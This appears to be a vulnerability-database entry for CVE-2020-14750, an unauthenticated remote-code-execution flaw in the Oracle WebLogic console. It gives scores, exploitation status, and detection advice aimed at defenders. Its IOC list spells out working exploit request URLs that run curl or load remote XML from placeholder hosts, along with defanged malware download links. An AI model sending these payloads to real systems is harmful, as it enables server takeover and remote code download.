cbcvebase.
CVE-2020-14750
published 2020-11-02

CVE-2020-14750: Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Console). Supported versions that are affected are 10.3.6.0.0…

PriorityP199critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
KEVITWEXPLOITInitial access
CISA Known Exploited Vulnerabilitydue 2022-05-03
Exploited in the wild
EPSS
99.27%
99.9th percentile
Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Console). Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. CVSS 3.1 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).

Affected

10 ranges
VendorProductVersion rangeFixed in
oracleweblogic_server——
oracleweblogic_server——
oracleweblogic_server——
oracleweblogic_server——
oracleweblogic_server——
oracle_corporationweblogic_server——
oracle_corporationweblogic_server——
oracle_corporationweblogic_server——
oracle_corporationweblogic_server——
oracle_corporationweblogic_server——

Detection & IOCsextracted from sources · hover to see the quote

urlGET /console/images/%252E%252E%252Fconsole.portal↗
urlGET /console/css/%252e%252e%252fconsole.portal↗
urlGET /console/..%2Fconsole.portal↗
urlGET /console/images/%252E%252E%252Fconsole.portal?_nfpb=false&_pageLabel=HomePage1&handle= com.tangosol.coherence.mvel2.sh.ShellSession (%22java.lang.Runtime.getRuntime(). exec (" curl http://x.x.x.x:1234 ");")↗
urlGET /console/images/%252E%252E%252Fconsole.portal?_nfpb=true&_pageLabel=HomePage1&handle=com.bea.core.repackaged.springframework.context.support.ClassPathXmlApplicationContext(" http://x.x.x.x:32531/poc.xml↗
urlGET /console/images/%252E%252E%252Fconsole.portal?handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext(%22 http://x.x.x.x %22)↗
hash2b03806939d1171f063ba8d14c3b10622edb5732e4f78dc4fe3eac98b56e5d46↗
hash55320dcb7e9e96d2723176c22483a81d47887c4c6ddf063dbf72b3bea5b279e3↗
hash57150938be45c4d9c742ab24c693acc14cc071d23b088a1facc2a7512af89414↗
hash9d42c2b6a10866842cbb6ab455ee2c3108e79fecbffb72eaf13f05215a826765↗
hashbb86dcfb6bca5fba8ab92d7a4ded9599baab400804c5fe5fb37aaef75f15e0ac↗
hash938804d619e2c7d2e3c31f1479574cbb8c85db14d3b5f0c70ccc22d4599f4ff7↗
hash61879d5b2f083b69e8e6cc6afce00be6619176151b093de14f2778a87ea46565↗
hash6e25ad03103a1a972b78c642bac09060fa79c460011dc5748cbb433cc459938b↗
hashdd603db3e2c0800d5eaa262b6b8553c68deaa486b545d4965df5dc43217cc839↗
hash0e574fd30e806fe4298b3cbccb8d1089454f42f52892f87554325cb352646049↗
hash3dbcd99edb3422b8fdc458b82aa7ecfe31296d32bb4d54450c9e9cac29fb6141↗
hasha254a26a27e36de4d96b6023f2dc8a82c4c4160a1d72b822f34ffdd5e9a0e0c9↗
urlhxxp://188[.]166[.]137[.]241/wp-content/themes/twentyseventeen/dk86↗
urlhxxp://153[.]121[.]58[.]102:80/wp-content/themes/zuki/m8↗
urlhxxp://3[.]10.224[.]87/[.]a/dk86↗
urlhxxp://194[.]38[.]20[.]199/wb.sh↗
urlhxxp://194[.]38[.]20[.]199/kinsing↗
pathC:\Windows\Temp\7fde\wget.bin↗
pathC:\Windows\Temp\7fde\7z.bin↗
filenamekdevtmpfsi↗
filenamebc.pl↗
  • →Monitor for WebLogic Java process spawning bash shells, indicative of post-exploitation activity following CVE-2020-14750 exploitation ↗
  • →Detect ShellSession or ClassPathXmlApplicationContext/FileSystemXmlApplicationContext handle parameters in WebLogic console HTTP requests as RCE exploitation indicators ↗
  • →Apply IPS rule 1010590 (Oracle WebLogic Server RCE vulnerabilities CVE-2020-14882, CVE-2020-14750, and CVE-2020-14883) to detect and block exploitation traffic ↗
  • →Detect cronjob creation downloading wb.sh as a persistence mechanism following WebLogic exploitation ↗
  • →On Windows post-exploitation, look for PROPHET SPIDER staging tools wget.bin and 7z.bin under C:\Windows\Temp\7fde\ ↗
  • ·The exploit URL patterns use placeholder IPs (x.x.x.x) in the sourced documents; actual attacker-controlled IPs must be substituted in real-world detections ↗
  • ·CVE-2020-14750 is closely related to CVE-2020-14882 and CVE-2020-14883; IPS rules and IOCs from campaigns often cover all three vulnerabilities together and may not be exclusively attributable to CVE-2020-14750 alone ↗
  • ·The /tmp/zzza flag file can be manually created to prevent Kinsing wb.sh from executing further infection steps, but this is a temporary mitigation and not a substitute for patching ↗

CVSS provenance

nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
vulncheck9.8CRITICAL
cisa9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.